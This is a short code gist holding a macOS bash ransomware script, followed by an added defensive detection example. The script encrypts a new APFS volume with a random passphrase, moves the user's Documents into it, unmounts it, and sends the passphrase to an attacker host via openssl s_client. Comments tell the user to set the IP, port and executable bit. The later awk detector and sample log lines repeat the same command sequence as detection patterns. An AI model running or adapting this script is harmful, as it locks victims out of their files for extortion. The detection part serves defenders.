@PonchoSec
Created September 20, 2022 11:26
macos_script_walkthrough.sh
#! /usr/bin/env bash
# Creating random and unique password
p=$(head -n 1024 /dev/urandom | strings| grep -o "[[:alnum:]]" | head -n 64| tr -d "\n");
# Identify Disk (Apple File System Volume)
disk_name=$(diskutil info / | grep "APFS Container:" | tr -s " "| cut -d" " -f4);
# Creating APFS Volume (aka drive) and encrypting it with password
diskutil apfs addVolume "${disk_name}" APFS XX -passphrase "${p}";
# Moving important files to the drive
mv -f ~/Documents/* /Volumes/XX;
# Unmounting drive
diskutil umount XX;
# echo'ing the password to the attacker using OpenSSL
echo $p | timeout 2 openssl s_client -quiet -connect 127.0.0.1:9001 2>/dev/null;
# Added this to ensure that the credentials cannot be recovered via memory dump
p="";
# change the IP address and Port number
# Use chmod +x name.sh to make the script executable
# name: <name>.sh
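
A defender-side check for the sequence this script performs, as an added example that is not part of the original gist: it scans process-execution events for an APFS volume created with an inline -passphrase, followed by files moved into /Volumes/ and an openssl s_client connection from the same session. The log format (epoch, session id, command line), the function names and the sample events are assumptions constructed for illustration.

```shell
#!/usr/bin/env bash
# Added detection example; not code from the gist above.
# Assumed event format (constructed): "<epoch> <session-id> <command line...>"
# Note: the script passes the passphrase as a command-line argument, so
# telemetry that records process arguments also records the passphrase.

# Print each session id that runs, in order:
#   1. diskutil apfs addVolume ... -passphrase ...
#   2. mv ... /Volumes/...
#   3. openssl s_client ... -connect ...
detect_volume_ransom() {
  awk '
    {
      sid = $2
      cmd = $0
      sub(/^[^ ]+ [^ ]+ /, "", cmd)   # drop epoch and session id
    }
    cmd ~ /diskutil apfs addVolume .* -passphrase/ { stage[sid] = 1; next }
    stage[sid] == 1 && cmd ~ /(^|[^A-Za-z0-9_])mv .* \/Volumes\// {
      stage[sid] = 2; next
    }
    stage[sid] == 2 && cmd ~ /openssl s_client .*-connect/ {
      if (!(sid in hit)) { hit[sid] = 1; print sid }
    }
  ' "$@"
}

# Constructed sample events: s1 is routine admin activity, s2 follows the
# sequence in the script (passphrase replaced by a placeholder).
sample_events() {
  cat <<'EOF'
1700000000 s1 diskutil apfs addVolume disk1 APFS Backup
1700000005 s1 mv -f /Users/a/report.pdf /Volumes/Backup
1700000009 s1 openssl s_client -connect example.com:443
1700000100 s2 diskutil apfs addVolume disk1 APFS XX -passphrase PLACEHOLDER
1700000101 s2 mv -f /Users/b/Documents/a.txt /Users/b/Documents/b.txt /Volumes/XX
1700000102 s2 diskutil umount XX
1700000103 s2 timeout 2 openssl s_client -quiet -connect 192.0.2.10:9001
EOF
}

sample_events | detect_volume_ransom
```

The function reads events from stdin or from files given as arguments; map the three patterns onto whatever fields your process telemetry actually exposes.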